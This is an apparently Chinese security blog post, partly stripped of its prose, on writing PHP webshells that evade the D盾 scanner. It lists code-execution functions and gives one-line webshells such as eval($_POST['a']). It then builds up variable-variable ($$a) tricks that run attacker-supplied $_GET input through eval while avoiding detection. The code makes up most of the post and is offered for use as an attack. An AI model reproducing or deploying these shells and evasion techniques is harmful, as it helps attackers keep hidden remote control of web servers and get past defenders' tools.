简简单单webshell绕过D盾

红蓝队 3年前 (2021) Jie
805 0 0

DwebshellphpD

D姿

psphpwebshellD

 

0x01 

 

PHP/

eval()
assert()
system()
shell()
shell_exec()
exec()
call_user_func()
call_user_func_array()
array_filter())

句木马

<?php eval($_POST['a']);?>
<?php assert(@$_POST['a']); ?>

0x02 D

php

简简单单webshell绕过D盾

5 eval

$_POST['a'] D

 

简简单单webshell绕过D盾

 

1 

$a 

 

简简单单webshell绕过D盾

 

eval 1Eval

PHP

$a 

<?php
$a="w";
echo $a;
?>
简简单单webshell绕过D盾

$$a 

<?php
$a="w";
$$a="c";
echo $$a;
?>
简简单单webshell绕过D盾

 

$w c$w 

$$aaw

<?php
$a="w";
$$a="c";
echo $w;
?>
简简单单webshell绕过D盾

 

<?php 
$a = 'ww';
$$a = $_GET['a'];
eval($ww);
?>
简简单单webshell绕过D盾

wwww

<?php 
$ww="heihei";
$a = 'ww';
$$a = $_GET['a'];
eval($ww);
?>
简简单单webshell绕过D盾

evalphp

echo 

<?php 
$ww="heihei";
$a = 'ww';
$$a = $_GET['a'];
echo eval($ww);
?>
简简单单webshell绕过D盾

 

简简单单webshell绕过D盾

 

 

 

版权声明:Jie 发表于 2021年11月9日 pm3:20。
转载请注明:简简单单webshell绕过D盾 | 黑客街

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...